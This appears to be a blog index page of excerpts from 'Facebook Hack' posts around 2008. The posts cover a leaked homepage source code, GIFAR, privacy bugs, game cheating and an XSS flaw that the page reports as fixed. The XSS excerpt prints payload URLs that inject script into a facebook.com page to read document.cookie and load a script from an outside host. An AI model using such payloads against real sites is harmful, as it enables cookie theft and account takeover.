Facebook Hack News: Maybe The Biggest Security Threat Facebook Has ever Faced - Its Homepage Source Code Publicly Revealed

On the 15th of August, facebooksecrets.blogspot.com published the homepage (index.php) source code of facebook’s website. Three hours later, the publication, on the blog hosted on the google-owned blogger network, was removed after a DMCA (Digital Millennium Copyright Act) take down notice from Facebook.You won’t find the DMCA notice on facebooksecrets.blogspot.com because this blog has been […]

Facebook Hack: A Photo Looking Back at Your Credentials Exploit - GIFAR part I

Let’s image that you go on a populous and secure website like Facebook for instance. And let’s image that you click on someone profile picture just to see it. After all, you’re on a secure website and a website like facebook will not allow redirection, isn’t it?!!! It is probably right, a website like Facebook, […]

Facebook Hack: How to See Things From Friends You Shouldn’t

This little hack will show you how to see some information concerning your friends that you should not have direct access to.
In this little hack sample, I will show you how to get access to any free gifts, and the messages associated to them, of your friends.
You just need to get the user ID of […]

Facebook Hack: XSS Vulnerability (fixed on the 23/05/2008)

This new vulnerability uses a XSS (Cross-Site Scripting) technique to obtain sensitive information from Facebook users and even allows to execute malicious script code on the user computer.
xssed.com who announced (author: Mox) that vulnerability give you good samples of how it works.
Redirection sample:
http://www.xssed.com/mirror/34274/
or
Insertion in a hidden iframe:
http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
{smartads}
According to Dimitris Pagkalos from xssed.com:
“I’m quite sure there […]

Facebook Hacks: How to Hack Applications like Tetris Blockstar

This 4′51” video shows us how to hack an application like Tetris Blockstar using a soft like CheatEngine.
 {smartads}
For the one who doesn’t know, Cheat Engine is a tool designed to give you the upper hand in games, but also contains other usefull tools to help debugging games and even normal applications.

Facebook News (hack): XML Sitemaps & FBML? New Facebook Vulnerability? - Part 2 1st of April

Do you remember my past article with the following title:
“Facebook News (hack): XML Sitemaps & FBML? New Facebook Vulnerability?”

In a news from developers.facebook.com from March 12, 2008 and according to Alex Moskalyuk:
“Starting today, you can serve XML sitemaps off apps.facebook.com domain, and notify search engines about changes on your pages. Naturally, this works better for […]

Facebook News (hack): XML Sitemaps & FBML? New Facebook Vulnerability?

In a news from developers.facebook.com from March 12, 2008 and according to Alex Moskalyuk:
“Starting today, you can serve XML sitemaps off apps.facebook.com domain, and notify search engines about changes on your pages. Naturally, this works better for pages that display content without requiring logins.”
This is indeed a really nice news for apps developers… But this […]

Facebook Hack Tutorial: How to Win $360,000/month on Facebook while sleeping.

If you are using Facebook applications that recompense your frequent logging, this might interest you.
If you are someone clever and energy saver like me, you probably keep your computer connected to the net 24/7. don’t you ?
I suppose you have a Facebook account?! So this (the 24/7 stuff) was the first of the […]

Facebook hack: A New Vulnerability That Allows Novices to Stage Easy and Powerful Attacks

According to an Article on pcworld.in written by Carrie-Ann Skinner, it seems that social networking sites (including Facebook) are vulnerable to a buffer overflow in the Aurigma ActiveX image uploading software.
Aurigma ActiveX Image Uploader is an ActiveX control that provides the ability to upload pictures from the Internet Explorer browser to a remote machine. This […]

Facebook Hack: How to See Tagged Photos from Anyone on Facebook

In a recent article, post by Brettz on brettz.com, it is fully explained a bug on Facebook which allowed anybody to see tagged photos from anyone on facebook even if they are private or in different network from you.
Unfortunately for some, fortunately for others, this bug was quite quickly fixed by Facebook (even if it […]

SRTH SRTH